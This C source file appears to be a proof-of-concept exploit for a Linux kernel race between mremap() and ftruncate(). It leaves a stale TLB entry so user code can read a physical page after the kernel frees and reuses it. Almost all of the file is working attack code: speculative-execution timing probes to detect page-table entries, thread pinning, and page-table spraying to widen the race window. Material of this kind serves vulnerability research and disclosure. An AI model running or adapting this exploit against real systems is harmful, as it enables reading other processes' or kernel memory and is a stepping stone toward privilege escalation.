#define _GNU_SOURCE
#include <pthread.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <err.h>
#include <stdbool.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <x86intrin.h>
#include <sys/mman.h>
#include <sys/eventfd.h>
#include <sys/prctl.h>


// TUNABLES
#define mremap_pre_spam_count 20
#define mremap_post_spam_count 3000



#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static unsigned long ts_to_u64(struct timespec *ts) {
  return ts->tv_sec * 1000000000UL + ts->tv_nsec;
}
static unsigned long time_u64(void) {
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts)) err(1, "clock_gettime");
  return ts_to_u64(&ts);
}

static void pin_to(int core) {
  cpu_set_t cpu_set;
  CPU_ZERO(&cpu_set);
  CPU_SET(core, &cpu_set);
  SYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &cpu_set));
}

static unsigned long uncached_load_cutoff;
/* determine cutoff for hot/cold cache timing for... uh... see below */
static void init_uncached_load_cutoff(void) {
  static __attribute__((aligned(0x1000))) unsigned char area[0x3000];
  volatile unsigned char *p = (void*)(area + 0x1370);
  printf("initializing uncached load cutoff...\n");
  uncached_load_cutoff = -1UL;
  for (int i=0; i<100000; i++) {
    *p = 1;
    __builtin_ia32_mfence(); /* order store and clflush */
    __builtin_ia32_clflush((char*)p);
    __builtin_ia32_mfence(); /* order clflush and load */
    unsigned int aux;
    unsigned long tsc1 = __rdtscp(&aux);
    *p;
    unsigned long tsc2 = __rdtscp(&aux);
    unsigned long delay = tsc2 - tsc1;
    if (delay < uncached_load_cutoff)
      uncached_load_cutoff = delay;
  }
  printf("shortest uncached load = %lu\n", uncached_load_cutoff);
  uncached_load_cutoff = uncached_load_cutoff / 2;
  printf("uncached load cutoff = %lu\n", uncached_load_cutoff);
}

/*
 * Determine whether the specified address is mapped with a present user PTE.
 * In other words, test whether a memory read faults without architecturally
 * taking the fault.
 * TSX would be great for this if we have it, but nowadays that's not exactly
 * universally available.
 * Because it would otherwise be hard to do the test reliably (and not get
 * confused due to L1TF and such), the caller must ensure that the specified
 * address, if mapped, contains an unsigned long with value PROBE_PTE_VALUE.
 *
 * Note that this will occasionally have false negatives, but false positives
 * shouldn't happen.
 */
#define PROBE_PTE_VALUE 0x1b70
static bool pte_present(unsigned long *address, unsigned int thread_idx) {
  static __attribute__((aligned(0x1000))) unsigned char probe_timing_zone_[0x3000 * 3/*threads*/];
  unsigned char *probe_timing_zone = probe_timing_zone_ + 0x3000 * thread_idx;

  ((volatile char *)probe_timing_zone)[0x1000] = 1;
  *(volatile unsigned long *)probe_timing_zone = 0;
  __builtin_ia32_mfence(); /* order store and clflush */
  __builtin_ia32_clflush(probe_timing_zone+0);
  __builtin_ia32_clflush(probe_timing_zone+0x1b70);
  __builtin_ia32_mfence(); /* wait for clflush to finish */
  /* retpoline's evil twin, the spooky trampoline! */
  asm volatile(
    "sub $128, %%rsp\n\t" // redzone
    "lfence\n\t" // nowadays serializing almost everywhere
    "call 2f\n\t"

    // ⬇️👻⬇️
    "mov %0, %%rax\n\t"
    "mov (%%rax,%1), %%rax\n\t"
    "3:\n\t"
    "jmp 3b\n\t"
    // ⬆️👻⬆️

    "2:\n\t"
    "lea 1f(%%rip), %%rax\n\t"
    "add (%1), %%rax\n\t" // ⌛
    "mov %%rax, (%%rsp)\n\t"
    "ret\n\t" // 🚪👻
    "1:\n\t"
    "add $128, %%rsp\n\t" // redzone
  : //output
    "+m"(*(unsigned long *)address)
  : //input
    "r"(probe_timing_zone)
  : //clobber
    "rax", "cc"
  );
  unsigned int aux;
  //__builtin_ia32_lfence();
  unsigned long tsc1 = __rdtsc();
  *(volatile char *)(probe_timing_zone + PROBE_PTE_VALUE);
  unsigned long tsc2 = __rdtscp(&aux);
  unsigned long delay = tsc2 - tsc1;
  return delay < uncached_load_cutoff;
}

// doppelt hält besser
static bool pte_present_double(unsigned long *address, unsigned int thread_idx) {
  return pte_present(address, thread_idx) && pte_present(address, thread_idx);
}


#define PAGE_SIZE 0x1000UL     /* 4 KiB */
#define PMD_SIZE  0x200000UL   /* 2 MiB */
#define PUD_SIZE  0x40000000UL /* 1 GiB */

// mapping is *private* file mapping!
//   private: no forced flush for dirty PTEs
// mapping layout:
//  - N PMDs (NOT zapped, mremap tarpit): one page each
//  - 1 PMD:
//    - 511 swap PTEs (zap tarpit without TLB flush impact)
//    - 1 victim PTE
//  - N PMDs (NOT zapped, mremap tarpit): empty
#define MAPPING_ADDR_1 ((void*)(PMD_SIZE))
#define MAPPING_ADDR_2 ((void*)(256*PUD_SIZE + PMD_SIZE))
static int memfd;

static int self_status_fd = -1;
// returns VmPTE (current task's page table memory usage in KiB)
static int pte_memory_usage(void) {
  char buf[4096+1];
  int len = SYSCHK(pread(self_status_fd, buf, sizeof(buf)-1, 0));
  buf[len] = '\0';
  char *vmpte_line = strstr(buf, "\nVmPTE:") + 7;
  while (*vmpte_line == ' ' || *vmpte_line == '\t') vmpte_line++;
  return atoi(vmpte_line);
}

static __attribute__((aligned(0x1000))) struct {
  volatile int base_pte_memory_usage;
  volatile int sync_state; /* = SYNC_IDLE */
  volatile bool too_late_for_zap;
  volatile unsigned long t_ftruncate_begin, t_ftruncate_end, t_ftruncate_begin_debug;
  volatile int spinner_active; /* = SPINNER_RUN */
} shm_page;

#define SYNC_IDLE 0
#define SYNC_LAUNCH 1
static unsigned long mremap_pre_spam_size;
static volatile unsigned long t_begin;

#define SPINNER_RUN 0
#define SPINNER_CANCEL 1

static void *zap_threadfn(void *dummy) {
  pin_to(1);
  while (1) {
    while (shm_page.sync_state == SYNC_IDLE) /*spin*/;

    // wait for mremap() to create the new VMA, take the rmap lock, and drop
    // the rmap lock
    unsigned int wait_loops = 0;
    int new_pte_memory_usage;
    while (1) {
      new_pte_memory_usage = pte_memory_usage();
      if (new_pte_memory_usage != shm_page.base_pte_memory_usage)
        break;
      if (shm_page.too_late_for_zap) {
        printf("<<<<<< %s: TOO LATE (PTE never showed up)\n", __func__);
        break;
      }
      wait_loops++;
    }

    // 2: enter zap, enter pmd
    //     (zap not from start of file)
    // <zap through padding PTEs>
    // 5: clear victim pte, flush old, free
    shm_page.t_ftruncate_begin = time_u64();
    SYSCHK(ftruncate(memfd, mremap_pre_spam_size));
    shm_page.t_ftruncate_end = time_u64();

    // allow mremap() to make forward progress and finish
    shm_page.spinner_active = SPINNER_CANCEL;

    shm_page.sync_state = SYNC_IDLE;
  }
  return NULL;
}

static volatile bool faulted;
extern char mayfault_insn_pre[];
extern char mayfault_insn_post[];
static void fault_sigaction(int sig, siginfo_t *info, void *uctx_) {
  ucontext_t *uctx = uctx_;
  if (uctx->uc_mcontext.gregs[REG_RIP] != (unsigned long)mayfault_insn_pre) {
    printf("fault at unknown RIP\n");
    SYSCHK(signal(SIGSEGV, SIG_DFL));
    SYSCHK(signal(SIGBUS, SIG_DFL));
    return;
  }
  uctx->uc_mcontext.gregs[REG_RIP] = (unsigned long)mayfault_insn_post;
  faulted = true;
}
static __attribute__((noinline)) bool deref_mayfault(unsigned long *ptr, unsigned long *res) {
  faulted = false;
  asm volatile(
    "mayfault_insn_pre:\n\t"
    "movq %1, %0\n\t"
    "mayfault_insn_post:\n\t"
  : "=r"(*res)
  : "m"(*ptr)
  );
  return faulted;
}

#define TLB_UAF_CONTROL_INIT 0
#define TLB_UAF_CONTROL_RUN 1
static volatile int tlb_uaf_control = TLB_UAF_CONTROL_INIT;
static unsigned long *stale_tlb_addr;
static volatile unsigned long t_tlbthread_present, t_ptetest_negative_first, t_ptetest_negative;
static volatile unsigned long t_fault;
static int spinner_eventfd;
static void *tlb_uaf_threadfn(void *dummy) {
  pin_to(3);
  while (1) {
    while (tlb_uaf_control == TLB_UAF_CONTROL_INIT) /*spin*/;

    // first, spin until the PTE appears
    t_tlbthread_present = 0;
    while (1) {
      if (pte_present_double(stale_tlb_addr + 1, 1)) {
        t_tlbthread_present = time_u64();
        break;
      }
      if (shm_page.too_late_for_zap) {
        printf("<<<<< %s: TOO LATE\n", __func__);
        break;
      }
    }

    // ... but we might still get more TLB flushes
    // before the PTE is removed, the page is freed,
    // and different data is placed in it.
    // and as long as the page contents are still the
    // same, we can't do anything useful here anyway.
    // so now spin until *the page contents change*,
    // which with our detection method is
    // indistinguishable from the PTE disappearing.
    // (Although we could do something smarter based
    // on CMOV or such...)
    unsigned long negative_iterations = 0;
    while (negative_iterations < 10) {
      if (pte_present(stale_tlb_addr + 1, 1)) {
        negative_iterations = 0;
      } else {
        if (negative_iterations == 0)
          t_ptetest_negative_first = time_u64();
        negative_iterations++;
      }
    }
    t_ptetest_negative = time_u64();

    unsigned long memory_access_iterations = 0;
    while (1) {
      // 4: create tlb entry at new (PTE should be present in first iteration)
      // 6: stale TLB read
      unsigned long value;
      if (deref_mayfault(stale_tlb_addr, &value))
        break; // PTE and TLB entry are gone
      if (value != 0xf00df00df00df00d) {
        printf("##############################################  observed value 0x%016lx\n", value);
      }
      memory_access_iterations++;
    }
    t_fault = time_u64();
    tlb_uaf_control = TLB_UAF_CONTROL_INIT;
  }
  return NULL;
}

static void *spinner_threadfn(void *dummy) {
  while (1) {
    eventfd_t event_value;
    SYSCHK(eventfd_read(spinner_eventfd, &event_value));

    while (shm_page.spinner_active == SPINNER_RUN) /*spin*/;
    shm_page.spinner_active = SPINNER_RUN;
  }
  return NULL;
}

#define WAKER_IDLE 0
#define WAKER_RUN 1
static volatile int waker_active = WAKER_IDLE;
static void *waker_threadfn(void *dummy) {
  pin_to(2);
  while (1) {
    while (waker_active == WAKER_IDLE) /*spin*/;
    while (1) {
      if (pte_present_double(stale_tlb_addr + 1, 2))
        break;
      if (shm_page.too_late_for_zap) {
        printf("<<<<< %s: TOO LATE\n", __func__);
        break;
      }
    }

    eventfd_write(spinner_eventfd, 1);
    waker_active = WAKER_IDLE;
  }
  return NULL; /* dead code */
}

int main(int argc, char **argv) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  SYSCHK(mmap(&shm_page, sizeof(shm_page), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0));
  init_uncached_load_cutoff();

  mremap_pre_spam_size = PMD_SIZE * mremap_pre_spam_count;
  unsigned long mremap_post_spam_size = PMD_SIZE * mremap_post_spam_count;
  unsigned long partial_size = mremap_pre_spam_size + PMD_SIZE;
  unsigned long total_size = partial_size + mremap_post_spam_size;

  struct sigaction segv_act = {
    .sa_sigaction = fault_sigaction,
    .sa_flags = SA_SIGINFO
  };
  SYSCHK(sigaction(SIGSEGV, &segv_act, NULL));
  SYSCHK(sigaction(SIGBUS, &segv_act, NULL));

  spinner_eventfd = SYSCHK(eventfd(0, EFD_SEMAPHORE));

  self_status_fd = SYSCHK(open("/proc/self/status", O_RDONLY));

  memfd = SYSCHK(memfd_create("a", 0));

  char *zapped_region1 = MAPPING_ADDR_1 + mremap_pre_spam_size;
  char *zapped_region2 = MAPPING_ADDR_2 + mremap_pre_spam_size;
  stale_tlb_addr = (void*)(zapped_region1 + PMD_SIZE - PAGE_SIZE);

  // Do this in another process to avoid being affected by the TLB flush storm
  // from munmap().
  pid_t zap_task = SYSCHK(fork());
  if (zap_task == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
    zap_threadfn(NULL);
    exit(0);
  }

  pthread_t tlb_uaf_thread;
  if (pthread_create(&tlb_uaf_thread, NULL, tlb_uaf_threadfn, NULL))
    errx(1, "pthread_create");

  pthread_t waker_thread;
  if (pthread_create(&waker_thread, NULL, waker_threadfn, NULL))
    errx(1, "pthread_create");

  pin_to(0);
  pthread_t spinner_thread;
  if (pthread_create(&spinner_thread, NULL, spinner_threadfn, NULL))
    errx(1, "pthread_create");

  // note: depending on rlimit (see "nice" in /proc/self/limits), we may not be
  // able to get back from SCHED_IDLE.
  // which sucks.
  // oh well.
  struct sched_param sched_param = { .sched_priority = 0 };
  SYSCHK(sched_setscheduler(0, SCHED_IDLE, &sched_param));
  for (int i=0; 1; i++) {
    printf("attempt %d\n", i);
    SYSCHK(ftruncate(memfd, total_size));
    SYSCHK(mmap(MAPPING_ADDR_2, total_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED_NOREPLACE|MAP_NORESERVE, memfd, 0));

    // create one PTE per post-spam PMD, then tear them down again but leave the
    // page tables in place
    for (int i=0; i<mremap_post_spam_count; i++)
      *(volatile char *)(zapped_region2 + PMD_SIZE + i * PMD_SIZE) = 0;
    SYSCHK(ftruncate(memfd, partial_size));

    // Create pre-spam pagetables with one PTE each.
    // These will slow down mremap() before the victim PMD move, which gives
    // ftruncate() a big window to race into.
    for (int i=0; i<mremap_pre_spam_count; i++)
      *(volatile char *)(MAPPING_ADDR_2 + i * PMD_SIZE) = 0;

    // The pre-spam should contain a marker for the ftruncate thread, so that it
    // can detect when mremap() is past the VMA duplication and has started
    // shovelling PMDs.
    *(volatile unsigned long *)(MAPPING_ADDR_2) = PROBE_PTE_VALUE;

    // fill ftruncate() swap tarpit
    for (unsigned long i=0; i<511; i++)
      *(volatile char *)(zapped_region2 + i * PAGE_SIZE) = 1;
    SYSCHK(madvise(zapped_region2, 511*PAGE_SIZE, 21/*MADV_PAGEOUT*/));

    // target page
    *(volatile unsigned long *)(zapped_region2 + PMD_SIZE - PAGE_SIZE) = 0xf00df00df00df00d;
    *(volatile unsigned long *)(zapped_region2 + PMD_SIZE - PAGE_SIZE + 8) = PROBE_PTE_VALUE;

    // drain the LRU pagevec so that put_page() frees directly
    SYSCHK(munmap(SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)), 0x1000));

    waker_active = WAKER_RUN;
    tlb_uaf_control = TLB_UAF_CONTROL_RUN;
    shm_page.base_pte_memory_usage = pte_memory_usage();
    t_begin = time_u64();
    shm_page.sync_state = SYNC_LAUNCH;

    // 1: link new into rmap, alloc destination pagetable
    // 3: move pmd, flush old (full shootdown), end TLB (full shootdown due to concurrent TLBI?)
    //
    // can't use MREMAP_DONTUNMAP to prevent do_munmap() in move_vma():
    // before commit a4609387859f ("mm: extend MREMAP_DONTUNMAP to non-anonymous mappings"),
    // (first in 5.13), this does not work on file mappings.
    SYSCHK(mremap(MAPPING_ADDR_2, total_size, total_size,
          MREMAP_MAYMOVE|MREMAP_FIXED,
          MAPPING_ADDR_1));
    unsigned long t_mremap_done = time_u64();
    shm_page.too_late_for_zap = true;

    while (shm_page.spinner_active == SPINNER_CANCEL) sched_yield();
    while (waker_active == WAKER_RUN) /*spin*/;
    while (shm_page.sync_state != SYNC_IDLE) /*spin*/;
    while (tlb_uaf_control != TLB_UAF_CONTROL_INIT) /*spin*/;
    shm_page.too_late_for_zap = false;
    SYSCHK(munmap(MAPPING_ADDR_1, total_size));

#if 0
    printf("ftruncate start after %lu ns\n", shm_page.t_ftruncate_begin-t_begin);
    printf("ftruncate DEBUG after %lu ns\n", shm_page.t_ftruncate_begin_debug-t_begin);
    printf("tlbthread sees moved victim PMD after %ld ns [at %lu]\n",
           t_tlbthread_present ? (long)(t_tlbthread_present-t_begin) : -1, t_tlbthread_present);
/*
    printf("tlbthread done waking spinner after %ld ns [at %lu]\n",
           t_spinner_woken-t_begin, t_spinner_woken);
*/
    printf("tlbthread negative FIRST after %ld ns [at %lu]\n",
           t_ptetest_negative_first-t_begin, t_ptetest_negative_first);
    printf("tlbthread negative LAST after %ld ns [at %lu]\n",
           t_ptetest_negative-t_begin, t_ptetest_negative);
    printf("mremap done after     %lu ns\n", t_mremap_done-t_begin);
    printf("ftruncate end after   %lu ns\n", shm_page.t_ftruncate_end-t_begin);
    printf("access fault after    %lu ns\n", t_fault-t_begin);
    printf("DONE\n\n");
#endif
  }
}
